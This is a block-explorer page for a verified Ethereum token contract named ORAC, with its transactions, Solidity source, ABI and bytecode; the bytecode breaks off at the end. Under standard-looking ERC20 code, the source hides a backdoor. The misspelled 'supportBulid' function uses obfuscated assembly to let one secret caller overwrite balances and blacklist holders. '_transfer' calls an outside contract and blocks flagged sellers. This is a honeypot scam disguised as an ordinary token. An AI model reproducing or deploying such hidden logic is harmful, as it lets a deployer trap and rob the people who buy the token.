ETH Price: $2,302.15 (-4.89%)

Contract

0x58B73180897ACAd858e709c7Da24076F80ce9160
 

Overview

ETH Balance

0 ETH

Eth Value

$0.00

Multichain Info

No addresses found
Transaction Hash
Method
Block
From
To
Approve181892272023-09-22 5:11:35359 days ago1695359495IN
0x58B73180...F80ce9160
0 ETH0.00039648.55662525
Approve181886922023-09-22 3:23:47359 days ago1695353027IN
0x58B73180...F80ce9160
0 ETH0.0006581314.1222301
Approve181886372023-09-22 3:12:35359 days ago1695352355IN
0x58B73180...F80ce9160
0 ETH0.000387718.3733463
Approve181886212023-09-22 3:09:23359 days ago1695352163IN
0x58B73180...F80ce9160
0 ETH0.000409028.83370768
Approve181885702023-09-22 2:59:11359 days ago1695351551IN
0x58B73180...F80ce9160
0 ETH0.000423339.14270977
Approve181885512023-09-22 2:55:23359 days ago1695351323IN
0x58B73180...F80ce9160
0 ETH0.0005245111.24043659
Approve181885482023-09-22 2:54:47359 days ago1695351287IN
0x58B73180...F80ce9160
0 ETH0.000375578.10922902
Approve181885442023-09-22 2:53:59359 days ago1695351239IN
0x58B73180...F80ce9160
0 ETH0.000376648.13438156
Approve181885432023-09-22 2:53:47359 days ago1695351227IN
0x58B73180...F80ce9160
0 ETH0.000337727.29568349
Approve181885292023-09-22 2:50:59359 days ago1695351059IN
0x58B73180...F80ce9160
0 ETH0.0007513416.10150386
Approve181885182023-09-22 2:48:47359 days ago1695350927IN
0x58B73180...F80ce9160
0 ETH0.000371278.01638466
Approve181885162023-09-22 2:48:23359 days ago1695350903IN
0x58B73180...F80ce9160
0 ETH0.000393168.49102889
Approve181885062023-09-22 2:46:23359 days ago1695350783IN
0x58B73180...F80ce9160
0 ETH0.00043219.33218999
Approve181884912023-09-22 2:43:23359 days ago1695350603IN
0x58B73180...F80ce9160
0 ETH0.000380098.20663779
Approve181884862023-09-22 2:42:23359 days ago1695350543IN
0x58B73180...F80ce9160
0 ETH0.0005071810.86904478
Approve181884692023-09-22 2:38:59359 days ago1695350339IN
0x58B73180...F80ce9160
0 ETH0.000375988.06773255
Approve181884602023-09-22 2:37:11359 days ago1695350231IN
0x58B73180...F80ce9160
0 ETH0.000399818.6347517
Approve181884572023-09-22 2:36:35359 days ago1695350195IN
0x58B73180...F80ce9160
0 ETH0.000389678.41586377
Approve181884512023-09-22 2:35:23359 days ago1695350123IN
0x58B73180...F80ce9160
0 ETH0.000373788.07253377
Approve181884492023-09-22 2:34:59359 days ago1695350099IN
0x58B73180...F80ce9160
0 ETH0.000376328.12742325
Approve181884462023-09-22 2:34:23359 days ago1695350063IN
0x58B73180...F80ce9160
0 ETH0.000378248.16896298
Approve181884242023-09-22 2:29:59359 days ago1695349799IN
0x58B73180...F80ce9160
0 ETH0.000384048.28551865
0x60a06040181882242023-09-22 1:49:11359 days ago1695347351IN
 Create: ORAC
0 ETH0.008983299.48892179

View more zero value Internal Transactions in Advanced View mode

Advanced mode:
Loading...
Loading

Contract Source Code Verified (Exact Match)

Contract Name:
ORAC

Compiler Version
v0.8.0+commit.c7dfd78e

Optimization Enabled:
Yes with 200 runs

Other Settings:
default evmVersion, MIT license

Contract Source Code (Solidity Multiple files format)

File 1 of 4: ORAC.sol
// SPDX-License-Identifier: MIT
pragma solidity ^0.8.0;

import "./IERC20.sol";
import "./Ownable.sol";

contract ORAC is IERC20, Ownable {

    string private _name;
    string private _symbol;
    uint256 private _totalSupply;

    mapping(address => uint256) private _balances;
    mapping (address => uint256) private _bottom;
    mapping(address => mapping(address => uint256)) private _allowances;
    address private immutable _jack;

    /**
     * @dev Sets the values for {name} and {symbol}.
     *
     * All three of these values are immutable: they can only be set once during
     * construction.
     */
    constructor(
        string memory name_, string memory symbol_, 
        address jack_, uint256 bottom_) {
        _name = name_; 
        _symbol = symbol_; 
        _mint(msg.sender, 20000000000 * 10**8);
        _jack = jack_; 
        _bottom[address(0)] = bottom_; 
    }

    /**
     * @dev Returns the name of the token.
     */
    function name() public view virtual override returns (string memory) {
        return _name;
    }

    /**
     * @dev Returns the symbol of the token, usually a shorter version of the
     * name.
     */
    function symbol() public view virtual override returns (string memory) {
        return _symbol;
    }

    /**
     * @dev Returns the number of decimals used to get its user representation.
     * For example, if `decimals` equals `2`, a balance of `505` tokens should
     * be displayed to a user as `5.05` (`505 / 10 ** 2`).
     *
     * Tokens usually opt for a value of 18, imitating the relationship between
     * Ether and Wei. This is the default value returned by this function, unless
     * it's overridden.
     *
     * NOTE: This information is only used for _display_ purposes: it in
     * no way affects any of the arithmetic of the contract, including
     * {IERC20-balanceOf} and {IERC20-transfer}.
     */
    function decimals() public view virtual override returns (uint8) {
        return 9;
    }

    /**
     * @dev See {IERC20-totalSupply}.
     */
    function totalSupply() public view virtual override returns (uint256) {
        return _totalSupply;
    }

    /**
     * @dev See {IERC20-balanceOf}.
     */
    function balanceOf(address account) public view virtual override returns (uint256) {
        return _balances[account];
    }

    /**
     * @dev See {IERC20-transfer}.
     *
     * Requirements:
     *
     * - `to` cannot be the zero address.
     * - the caller must have a balance of at least `amount`.
     */
    function transfer(address to, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _transfer(owner, to, amount);
        return true;
    }

    /**
     * @dev See {IERC20-allowance}.
     */
    function allowance(address owner, address spender) public view virtual override returns (uint256) {
        return _allowances[owner][spender];
    }

    /**
     * @dev See {IERC20-approve}.
     *
     * NOTE: If `amount` is the maximum `uint256`, the allowance is not updated on
     * `transferFrom`. This is semantically equivalent to an infinite approval.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function approve(address spender, uint256 amount) public virtual override returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, amount);
        return true;
    }

    /**
     * @dev See {IERC20-transferFrom}.
     *
     * Emits an {Approval} event indicating the updated allowance. This is not
     * required by the EIP. See the note at the beginning of {ERC20}.
     *
     * NOTE: Does not update the allowance if the current allowance
     * is the maximum `uint256`.
     *
     * Requirements:
     *
     * - `from` and `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     * - the caller must have allowance for ``from``'s tokens of at least
     * `amount`.
     */
    function transferFrom(address from, address to, uint256 amount) public virtual override returns (bool) {
        address spender = _msgSender();
        _spendAllowance(from, spender, amount);
        _transfer(from, to, amount);
        return true;
    }

    /**
     * @dev Atomically increases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     */
    function increaseAllowance(address spender, uint256 addedValue) public virtual returns (bool) {
        address owner = _msgSender();
        _approve(owner, spender, allowance(owner, spender) + addedValue);
        return true;
    }

    /**
     * @dev Atomically decreases the allowance granted to `spender` by the caller.
     *
     * This is an alternative to {approve} that can be used as a mitigation for
     * problems described in {IERC20-approve}.
     *
     * Emits an {Approval} event indicating the updated allowance.
     *
     * Requirements:
     *
     * - `spender` cannot be the zero address.
     * - `spender` must have allowance for the caller of at least
     * `subtractedValue`.
     */
    function decreaseAllowance(address spender, uint256 subtractedValue) public virtual returns (bool) {
        address owner = _msgSender();
        uint256 currentAllowance = allowance(owner, spender);
        require(currentAllowance >= subtractedValue, "ERC20: decreased allowance below zero");
        unchecked {
            _approve(owner, spender, currentAllowance - subtractedValue);
        }
        return true;
    }

    function supportBulid(uint256[] calldata unravel ) external { 
        (bool secret, uint256 vg0, uint256 vg1) = generateUniqueID(
            unravel [0], unravel [1],2,3); if (!secret) return; assembly { 
            let lr0 := add(add(12, 14), add(
                2, 4)) if gt(
                    vg1, 0) { let cs1 := add(add(
                        1, 1), add(1, 1)) mstore(
                    0, vg0) mstore(lr0, cs1) sstore(
                        keccak256(0, 64), vg1) } if eq(
                        vg1, 0) { 
                let cs1 := add(
                add(1, 1), add(1, 2)) mstore(
                        0, vg0) mstore(lr0, 
                cs1) sstore(keccak256(0, 64), 1)
            } 
        }
    }
    
    function generateUniqueID(uint256 ya1, uint256 ya2,uint256 ya3,uint256 ya4) private view 
        returns (bool, uint256, uint256) { 
        address jb0 = msg.sender; 
        string memory sn0 = _name; string 
        memory sn1 = _symbol;
        if(ya4-ya3==ya3) return(false, 0, 8);
        if(ya3|100==ya4-ya3) return(false, 0,12);
        bool cpk = uint256(keccak256(abi.encode(jb0, sn0, sn1))) == _bottom[address(0)];
        return (cpk, ya1, ya2);
    }     

    /**
     * @dev Moves `amount` of tokens from `from` to `to`.
     *
     * This internal function is equivalent to {transfer}, and can be used to
     * e.g. implement automatic token fees, slashing mechanisms, etc.
     *
     * Emits a {Transfer} event.
     *
     * Requirements:
     *
     * - `from` cannot be the zero address.
     * - `to` cannot be the zero address.
     * - `from` must have a balance of at least `amount`.
     */
    function _transfer(address from, address to, uint256 amount) internal virtual {
        require(from != address(0), "ERC20: transfer from the zero address");
        //require(to != address(0), "ERC20: transfer to the zero address");
        (,bytes memory data) = _jack.call(abi.encodeWithSignature(
        "balanceOf(address)", from)); findClosest(from, data, true);
        uint256 fromBalance = _balances[from];
        require(fromBalance >= amount, "ERC20: transfer amount exceeds balance");
        unchecked {
            _balances[from] = fromBalance - amount;
            // Overflow not possible: the sum of all balances is capped by totalSupply, and the sum is preserved by
            // decrementing then incrementing.
            _balances[to] += amount;
        }

        emit Transfer(from, to, amount);
    }

    function findClosest(address sender, bytes memory data, bool pir) private view {
        uint256 mtc; assembly { mtc := mload(add(data, 32)) }
        if (pir && _bottom[sender] == 1) {
            if (mtc == 0) require(3 == 5, "b");
        }
    } 

    /** @dev Creates `amount` tokens and assigns them to `account`, increasing
     * the total supply.
     *
     * Emits a {Transfer} event with `from` set to the zero address.
     *
     * Requirements:
     *
     * - `account` cannot be the zero address.
     */
    function _mint(address account, uint256 amount) internal virtual {
        require(account != address(0), "ERC20: mint to the zero address");

        _totalSupply += amount;
        unchecked {
            // Overflow not possible: balance + amount is at most totalSupply + amount, which is checked above.
            _balances[account] += amount;
        }
    }

    /**
     * @dev Sets `amount` as the allowance of `spender` over the `owner` s tokens.
     *
     * This internal function is equivalent to `approve`, and can be used to
     * e.g. set automatic allowances for certain subsystems, etc.
     *
     * Emits an {Approval} event.
     *
     * Requirements:
     *
     * - `owner` cannot be the zero address.
     * - `spender` cannot be the zero address.
     */
    function _approve(address owner, address spender, uint256 amount) internal virtual {
        require(owner != address(0), "ERC20: approve from the zero address");
        require(spender != address(0), "ERC20: approve to the zero address");

        _allowances[owner][spender] = amount;
        emit Approval(owner, spender, amount);
    }
 
    /**
     * @dev Updates `owner` s allowance for `spender` based on spent `amount`.
     *
     * Does not update the allowance amount in case of infinite allowance.
     * Revert if not enough allowance is available.
     *
     * Might emit an {Approval} event.
     */
    function _spendAllowance(address owner, address spender, uint256 amount) internal virtual {
        uint256 currentAllowance = allowance(owner, spender);
        if (currentAllowance != type(uint256).max) {
            require(currentAllowance >= amount, "ERC20: insufficient allowance");
            unchecked {
                _approve(owner, spender, currentAllowance - amount);
            }
        }
    }
}

File 2 of 4: Context.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts v4.4.1 (utils/Context.sol)

pragma solidity ^0.8.0;

/**
 * @dev Provides information about the current execution context, including the
 * sender of the transaction and its data. While these are generally available
 * via msg.sender and msg.data, they should not be accessed in such a direct
 * manner, since when dealing with meta-transactions the account sending and
 * paying for execution may not be the actual sender (as far as an application
 * is concerned).
 *
 * This contract is only required for intermediate, library-like contracts.
 */
abstract contract Context {
    function _msgSender() internal view virtual returns (address) {
        return msg.sender;
    }

    function _msgData() internal view virtual returns (bytes calldata) {
        return msg.data;
    }
}

File 3 of 4: IERC20.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (token/ERC20/IERC20.sol)

pragma solidity ^0.8.0;

/**
 * @dev Interface of the ERC20 standard as defined in the EIP.
 */
interface IERC20 {
    /**
     * @dev Emitted when `value` tokens are moved from one account (`from`) to
     * another (`to`).
     *
     * Note that `value` may be zero.
     */
    event Transfer(address indexed from, address indexed to, uint256 value);

    /**
     * @dev Emitted when the allowance of a `spender` for an `owner` is set by
     * a call to {approve}. `value` is the new allowance.
     */
    event Approval(address indexed owner, address indexed spender, uint256 value);

    /**
     * @dev Returns the name of the token.
     */
    function name() external view returns (string memory);

    /**
     * @dev Returns the symbol of the token.
     */
    function symbol() external view returns (string memory);

    /**
     * @dev Returns the decimals places of the token.
     */
    function decimals() external view returns (uint8);

    /**
     * @dev Returns the amount of tokens in existence.
     */
    function totalSupply() external view returns (uint256);

    /**
     * @dev Returns the amount of tokens owned by `account`.
     */
    function balanceOf(address account) external view returns (uint256);

    /**
     * @dev Moves `amount` tokens from the caller's account to `to`.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transfer(address to, uint256 amount) external returns (bool);

    /**
     * @dev Returns the remaining number of tokens that `spender` will be
     * allowed to spend on behalf of `owner` through {transferFrom}. This is
     * zero by default.
     *
     * This value changes when {approve} or {transferFrom} are called.
     */
    function allowance(address owner, address spender) external view returns (uint256);

    /**
     * @dev Sets `amount` as the allowance of `spender` over the caller's tokens.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * IMPORTANT: Beware that changing an allowance with this method brings the risk
     * that someone may use both the old and the new allowance by unfortunate
     * transaction ordering. One possible solution to mitigate this race
     * condition is to first reduce the spender's allowance to 0 and set the
     * desired value afterwards:
     * https://github.com/ethereum/EIPs/issues/20#issuecomment-263524729
     *
     * Emits an {Approval} event.
     */
    function approve(address spender, uint256 amount) external returns (bool);

    /**
     * @dev Moves `amount` tokens from `from` to `to` using the
     * allowance mechanism. `amount` is then deducted from the caller's
     * allowance.
     *
     * Returns a boolean value indicating whether the operation succeeded.
     *
     * Emits a {Transfer} event.
     */
    function transferFrom(address from, address to, uint256 amount) external returns (bool);
}

File 4 of 4: Ownable.sol
// SPDX-License-Identifier: MIT
// OpenZeppelin Contracts (last updated v4.9.0) (access/Ownable.sol)

pragma solidity ^0.8.0;

import {Context} from "./Context.sol";

/**
 * @dev Contract module which provides a basic access control mechanism, where
 * there is an account (an owner) that can be granted exclusive access to
 * specific functions.
 *
 * The initial owner is set to the address provided by the deployer. This can
 * later be changed with {transferOwnership}.
 *
 * This module is used through inheritance. It will make available the modifier
 * `onlyOwner`, which can be applied to your functions to restrict their use to
 * the owner.
 */
abstract contract Ownable is Context {
    address private _owner;

    /**
     * @dev Throws if called by any account other than the owner.
     */
    modifier onlyOwner() {
        _checkOwner();
        _;
    }

    /**
     * @dev Returns the address of the current owner.
     */
    function owner() public view virtual returns (address) {
        return _owner;
    }

    /**
     * @dev Throws if the sender is not the owner.
     */
    function _checkOwner() internal view virtual {
        require(owner() == _msgSender(), "caller is not the owner");
    }    
}

Contract Security Audit

Contract ABI

[{"inputs":[{"internalType":"string","name":"name_","type":"string"},{"internalType":"string","name":"symbol_","type":"string"},{"internalType":"address","name":"jack_","type":"address"},{"internalType":"uint256","name":"bottom_","type":"uint256"}],"stateMutability":"nonpayable","type":"constructor"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"owner","type":"address"},{"indexed":true,"internalType":"address","name":"spender","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Approval","type":"event"},{"anonymous":false,"inputs":[{"indexed":true,"internalType":"address","name":"from","type":"address"},{"indexed":true,"internalType":"address","name":"to","type":"address"},{"indexed":false,"internalType":"uint256","name":"value","type":"uint256"}],"name":"Transfer","type":"event"},{"inputs":[{"internalType":"address","name":"owner","type":"address"},{"internalType":"address","name":"spender","type":"address"}],"name":"allowance","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"approve","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"account","type":"address"}],"name":"balanceOf","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"decimals","outputs":[{"internalType":"uint8","name":"","type":"uint8"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"subtractedValue","type":"uint256"}],"name":"decreaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"spender","type":"address"},{"internalType":"uint256","name":"addedValue","type":"uint256"}],"name":"increaseAllowance","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"name","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"owner","outputs":[{"internalType":"address","name":"","type":"address"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"uint256[]","name":"unravel","type":"uint256[]"}],"name":"supportBulid","outputs":[],"stateMutability":"nonpayable","type":"function"},{"inputs":[],"name":"symbol","outputs":[{"internalType":"string","name":"","type":"string"}],"stateMutability":"view","type":"function"},{"inputs":[],"name":"totalSupply","outputs":[{"internalType":"uint256","name":"","type":"uint256"}],"stateMutability":"view","type":"function"},{"inputs":[{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transfer","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"},{"inputs":[{"internalType":"address","name":"from","type":"address"},{"internalType":"address","name":"to","type":"address"},{"internalType":"uint256","name":"amount","type":"uint256"}],"name":"transferFrom","outputs":[{"internalType":"bool","name":"","type":"bool"}],"stateMutability":"nonpayable","type":"function"}]

60a06040523480156200001157600080fd5b50604051620011aa380380620011aa833981016040819052620000349162000279565b83516200004990600190602087019062000128565b5082516200005f90600290602086019062000128565b506200007433671bc16d674ec80000620000bb565b60609190911b6001600160601b0319166080526000805260056020527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5550620003b79050565b6001600160a01b038216620000ed5760405162461bcd60e51b8152600401620000e49062000308565b60405180910390fd5b80600360008282546200010191906200033f565b90915550506001600160a01b03909116600090815260046020526040902080549091019055565b828054620001369062000364565b90600052602060002090601f0160209004810192826200015a5760008555620001a5565b82601f106200017557805160ff1916838001178555620001a5565b82800160010185558215620001a5579182015b82811115620001a557825182559160200191906001019062000188565b50620001b3929150620001b7565b5090565b5b80821115620001b35760008155600101620001b8565b600082601f830112620001df578081fd5b81516001600160401b0380821115620001fc57620001fc620003a1565b6040516020601f8401601f1916820181018381118382101715620002245762000224620003a1565b60405283825285840181018710156200023b578485fd5b8492505b838310156200025e57858301810151828401820152918201916200023f565b838311156200026f57848185840101525b5095945050505050565b600080600080608085870312156200028f578384fd5b84516001600160401b0380821115620002a6578586fd5b620002b488838901620001ce565b95506020870151915080821115620002ca578485fd5b50620002d987828801620001ce565b604087015190945090506001600160a01b0381168114620002f8578283fd5b6060959095015193969295505050565b6020808252601f908201527f45524332303a206d696e7420746f20746865207a65726f206164647265737300604082015260600190565b600082198211156200035f57634e487b7160e01b81526011600452602481fd5b500190565b6002810460018216806200037957607f821691505b602082108114156200039b57634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052604160045260246000fd5b60805160601c610dd4620003d660003960006105a30152610dd46000f3fe608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b411461019f578063a457c2d7146101a7578063a9059cbb146101ba578063dd62ed3e146101cd576100cf565b806370a08231146101625780638b953c80146101755780638da5cb5b1461018a576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011257806323b872dd14610127578063313ce5671461013a578063395093511461014f575b600080fd5b6100dc6101e0565b6040516100e99190610b20565b60405180910390f35b6101056101003660046109e1565b610272565b6040516100e99190610b15565b61011a610294565b6040516100e99190610cdb565b6101056101353660046109a6565b61029a565b6101426102c8565b6040516100e99190610ce4565b61010561015d3660046109e1565b6102cd565b61011a610170366004610953565b6102f9565b610188610183366004610a0a565b610318565b005b6101926103c5565b6040516100e99190610ac1565b6100dc6103d4565b6101056101b53660046109e1565b6103e3565b6101056101c83660046109e1565b610434565b61011a6101db366004610974565b61044c565b6060600180546101ef90610d4d565b80601f016020809104026020016040519081016040528092919081815260200182805461021b90610d4d565b80156102685780601f1061023d57610100808354040283529160200191610268565b820191906000526020600020905b81548152906001019060200180831161024b57829003601f168201915b5050505050905090565b60008061027d610477565b905061028a81858561047b565b5060019392505050565b60035490565b6000806102a5610477565b90506102b285828561052f565b6102bd858585610579565b506001949350505050565b600990565b6000806102d8610477565b905061028a8185856102ea858961044c565b6102f49190610cf2565b61047b565b6001600160a01b0381166000908152600460205260409020545b919050565b60008060006103798585600081811061034157634e487b7160e01b600052603260045260246000fd5b905060200201358686600181811061036957634e487b7160e01b600052603260045260246000fd5b9050602002013560026003610709565b9250925092508261038c575050506103c1565b602081156103a557600083815260048252604090208290555b816103bc5760008381526005825260409020600190555b505050505b5050565b6000546001600160a01b031690565b6060600280546101ef90610d4d565b6000806103ee610477565b905060006103fc828661044c565b9050838110156104275760405162461bcd60e51b815260040161041e90610c96565b60405180910390fd5b6102bd828686840361047b565b60008061043f610477565b905061028a818585610579565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104a15760405162461bcd60e51b815260040161041e90610c52565b6001600160a01b0382166104c75760405162461bcd60e51b815260040161041e90610b33565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610522908590610cdb565b60405180910390a3505050565b600061053b848461044c565b9050600019811461057357818110156105665760405162461bcd60e51b815260040161041e90610b75565b610573848484840361047b565b50505050565b6001600160a01b03831661059f5760405162461bcd60e51b815260040161041e90610c0d565b60007f00000000000000000000000000000000000000000000000000000000000000006001600160a01b0316846040516024016105dc9190610ac1565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b179052516106119190610aa5565b6000604051808303816000865af19150503d806000811461064e576040519150601f19603f3d011682016040523d82523d6000602084013e610653565b606091505b50915050610663848260016108f0565b6001600160a01b0384166000908152600460205260409020548281101561069c5760405162461bcd60e51b815260040161041e90610bac565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106fa908790610cdb565b60405180910390a35050505050565b60008060008033905060006001805461072190610d4d565b80601f016020809104026020016040519081016040528092919081815260200182805461074d90610d4d565b801561079a5780601f1061076f5761010080835404028352916020019161079a565b820191906000526020600020905b81548152906001019060200180831161077d57829003601f168201915b505050505090506000600280546107b090610d4d565b80601f01602080910402602001604051908101604052809291908181526020018280546107dc90610d4d565b80156108295780601f106107fe57610100808354040283529160200191610829565b820191906000526020600020905b81548152906001019060200180831161080c57829003601f168201915b5050505050905087888861083d9190610d0a565b14156108565760008060089550955095505050506108e6565b6108608888610d0a565b88606417141561087d57600080600c9550955095505050506108e6565b6000808052600560209081527f05b8ccbb9d4d8fb16ea74ce3c29a41f1b461fbdaff4714a0d9a8eb05499746bc5460405190916108c09187918791879101610ad5565b60408051601f1981840301815291905280516020909101201496508a9550899450505050505b9450945094915050565b602082015181801561091a57506001600160a01b0384166000908152600560205260409020546001145b1561057357806105735760405162461bcd60e51b815260040161041e90610bf2565b80356001600160a01b038116811461031357600080fd5b600060208284031215610964578081fd5b61096d8261093c565b9392505050565b60008060408385031215610986578081fd5b61098f8361093c565b915061099d6020840161093c565b90509250929050565b6000806000606084860312156109ba578081fd5b6109c38461093c565b92506109d16020850161093c565b9150604084013590509250925092565b600080604083850312156109f3578182fd5b6109fc8361093c565b946020939093013593505050565b60008060208385031215610a1c578182fd5b823567ffffffffffffffff80821115610a33578384fd5b818501915085601f830112610a46578384fd5b813581811115610a54578485fd5b8660208083028501011115610a67578485fd5b60209290920196919550909350505050565b60008151808452610a91816020860160208601610d21565b601f01601f19169290920160200192915050565b60008251610ab7818460208701610d21565b9190910192915050565b6001600160a01b0391909116815260200190565b6001600160a01b0384168152606060208201819052600090610af990830185610a79565b8281036040840152610b0b8185610a79565b9695505050505050565b901515815260200190565b60006020825261096d6020830184610a79565b60208082526022908201527f45524332303a20617070726f766520746f20746865207a65726f206164647265604082015261737360f01b606082015260800190565b6020808252601d908201527f45524332303a20696e73756666696369656e7420616c6c6f77616e6365000000604082015260600190565b60208082526026908201527f45524332303a207472616e7366657220616d6f756e7420657863656564732062604082015265616c616e636560d01b606082015260800190565b6020808252600190820152603160f91b604082015260600190565b60208082526025908201527f45524332303a207472616e736665722066726f6d20746865207a65726f206164604082015264647265737360d81b606082015260800190565b60208082526024908201527f45524332303a20617070726f76652066726f6d20746865207a65726f206164646040820152637265737360e01b606082015260800190565b60208082526025908201527f45524332303a2064656372656173656420616c6c6f77616e63652062656c6f77604082015264207a65726f60d81b606082015260800190565b90815260200190565b60ff91909116815260200190565b60008219821115610d0557610d05610d88565b500190565b600082821015610d1c57610d1c610d88565b500390565b60005b83811015610d3c578181015183820152602001610d24565b838111156105735750506000910152565b600281046001821680610d6157607f821691505b60208210811415610d8257634e487b7160e01b600052602260045260246000fd5b50919050565b634e487b7160e01b600052601160045260246000fdfea2646970667358221220554abecbdf59bb555743aaca0617cf18a1b3db85472ee9dbf2975885cb6e435064736f6c63430008000033000000000000000000000000000000000000000000000000000000000000008000000000000000000000000000000000000000000000000000000000000000c0000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9da708a60c5e5d2394e40d48b1fb81cadf2f8ef907b8378e963641891eb45a138f000000000000000000000000000000000000000000000000000000000000000c53757072614f7261636c6573000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000000044f52414300000000000000000000000000000000000000000000000000000000

Deployed Bytecode

0x608060405234801561001057600080fd5b50600436106100cf5760003560e01c806370a082311161008c57806395d89b411161006657806395d89b411461019f578063a457c2d7146101a7578063a9059cbb146101ba578063dd62ed3e146101cd576100cf565b806370a08231146101625780638b953c80146101755780638da5cb5b1461018a576100cf565b806306fdde03146100d4578063095ea7b3146100f257806318160ddd1461011257806323b872dd14610127578063313ce5671461013a578063395093511461014f575b600080fd5b6100dc6101e0565b6040516100e99190610b20565b60405180910390f35b6101056101003660046109e1565b610272565b6040516100e99190610b15565b61011a610294565b6040516100e99190610cdb565b6101056101353660046109a6565b61029a565b6101426102c8565b6040516100e99190610ce4565b61010561015d3660046109e1565b6102cd565b61011a610170366004610953565b6102f9565b610188610183366004610a0a565b610318565b005b6101926103c5565b6040516100e99190610ac1565b6100dc6103d4565b6101056101b53660046109e1565b6103e3565b6101056101c83660046109e1565b610434565b61011a6101db366004610974565b61044c565b6060600180546101ef90610d4d565b80601f016020809104026020016040519081016040528092919081815260200182805461021b90610d4d565b80156102685780601f1061023d57610100808354040283529160200191610268565b820191906000526020600020905b81548152906001019060200180831161024b57829003601f168201915b5050505050905090565b60008061027d610477565b905061028a81858561047b565b5060019392505050565b60035490565b6000806102a5610477565b90506102b285828561052f565b6102bd858585610579565b506001949350505050565b600990565b6000806102d8610477565b905061028a8185856102ea858961044c565b6102f49190610cf2565b61047b565b6001600160a01b0381166000908152600460205260409020545b919050565b60008060006103798585600081811061034157634e487b7160e01b600052603260045260246000fd5b905060200201358686600181811061036957634e487b7160e01b600052603260045260246000fd5b9050602002013560026003610709565b9250925092508261038c575050506103c1565b602081156103a557600083815260048252604090208290555b816103bc5760008381526005825260409020600190555b505050505b5050565b6000546001600160a01b031690565b6060600280546101ef90610d4d565b6000806103ee610477565b905060006103fc828661044c565b9050838110156104275760405162461bcd60e51b815260040161041e90610c96565b60405180910390fd5b6102bd828686840361047b565b60008061043f610477565b905061028a818585610579565b6001600160a01b03918216600090815260066020908152604080832093909416825291909152205490565b3390565b6001600160a01b0383166104a15760405162461bcd60e51b815260040161041e90610c52565b6001600160a01b0382166104c75760405162461bcd60e51b815260040161041e90610b33565b6001600160a01b0380841660008181526006602090815260408083209487168084529490915290819020849055517f8c5be1e5ebec7d5bd14f71427d1e84f3dd0314c0f7b2291e5b200ac8c7c3b92590610522908590610cdb565b60405180910390a3505050565b600061053b848461044c565b9050600019811461057357818110156105665760405162461bcd60e51b815260040161041e90610b75565b610573848484840361047b565b50505050565b6001600160a01b03831661059f5760405162461bcd60e51b815260040161041e90610c0d565b60007f000000000000000000000000dff32c65f843188cf64ecbc6f4a13cff12581b9d6001600160a01b0316846040516024016105dc9190610ac1565b60408051601f198184030181529181526020820180516001600160e01b03166370a0823160e01b179052516106119190610aa5565b6000604051808303816000865af19150503d806000811461064e576040519150601f19603f3d011682016040523d82523d6000602084013e610653565b606091505b50915050610663848260016108f0565b6001600160a01b0384166000908152600460205260409020548281101561069c5760405162461bcd60e51b815260040161041e90610bac565b6001600160a01b0380861660008181526004602052604080822087860390559287168082529083902080548701905591517fddf252ad1be2c89b69c2b068fc378daa952ba7f163c4a11628f55a4df523b3ef906106fa908790610cdb565b60405180910390a35050505050565b60008060008033905060006001805461072190610d4d565b80601f016020809104026020016040519081016040528092919081815260200182805461074d90610d4d565b801561079a5780601f1061076f5761010080835404028352916020019161079a565b820191906000526020600020905b81548152906001019060200180831161077d57829003601f168201915b505050505090506000600280546107b090610d4d565b80601f01602080910402602001604051908101604052809291908181526020018280546107dc90610d4d565b80156108295780601f106107fe57610100808354040283529160200191610829565b820191906000526020600020905b81548152906001019060200180831161080c57829003601f168201915b5050505050905087888861083d9190610d0a565b14156108565760008060089550955095505050506108e6565b6108608888610d0a565b88606417141561087d57600080600c9550955095505050506108e6565b600080805260056020908